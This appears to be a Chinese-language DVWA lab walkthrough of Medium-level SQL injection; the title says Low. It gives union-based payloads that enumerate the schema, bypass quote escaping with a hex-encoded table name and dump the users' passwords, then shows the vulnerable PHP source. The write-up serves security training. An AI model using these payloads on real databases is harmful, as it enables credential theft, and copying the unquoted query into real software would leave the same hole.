DVWA--SQL注入(SQL Injection)--Low
目錄
級別:Medium
Medium級別的代碼利用mysql_real_escape_string函數對特殊符號\x00,\n,\r,,’,”,\x1a進行轉義,同時前端頁面設置了下拉選擇表單,希望以此來控制用戶的輸入。雖然前端使用了下拉選擇菜單,但我們依然可以通過抓包改參數,提交惡意構造的查詢參數。所以就用到了抓包軟件burpsuite以及服務器的代理設置。
1、查看POST請求
2、hackbar提交POST請求
切換到hackbar-->Load URL-->Post Data輸入id=3&Submit=Submit
3、輸入',報錯,判斷爲數字型注入
4、猜測SQL查詢的字段數
由下面結果可知,SQL查詢結果字段數爲2
id=1 order by 2 &Submit=Submit #查詢成功
id=1 order by 4 &Submit=Submit #查詢失敗
id=1 order by 3 &Submit=Submit #查詢失敗
5、確定回顯的位置
id=1 union select 1,2 &Submit=Submit
6、獲取當前數據庫及版本信息
id=1 and 1=2 union select database(),version() &Submit=Submit
7、獲取數據庫中表信息(group_concat())
id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() &Submit=Submit
8、獲取表字段
因爲單引號會被轉義,故需要繞過轉義,可使用16進制繞過
字符串-十六進制轉換:https://zixuephp.net/tool-str-hex.html
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' &Submit=Submit
因單引號被轉義報錯:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'users\'' at line 1
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # &Submit=Submit
9、獲取用戶信息
id=1 and 1=2 union select user,password from users # &Submit=Submit
10、密文解碼
後臺源碼
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>